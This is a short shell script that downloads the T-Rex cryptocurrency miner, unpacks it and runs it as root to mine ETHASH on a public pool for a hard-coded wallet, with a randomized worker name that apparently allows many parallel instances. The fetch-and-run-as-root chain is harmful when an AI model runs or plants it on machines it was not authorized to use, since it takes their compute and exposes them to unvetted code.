#!/bin/sh
apt-get install libpci3 && wget https://trex-miner.com/download/t-rex-0.19.14-linux-cuda11.1.tar.gz && tar -xvf t-rex-0.19.14-linux-cuda11.1.tar.gz && sudo ./t-rex -a ETHASH -o ethash.unmineable.com:3333 -u TRX:TGEThftjLnxmSJWhNzbgYpAU7MXVZho822.$(echo $(shuf -i 2-5 -n 1)-$(shuf -i 1-111 -n 1)-flatwhite#zs6c-f3hw) -p x
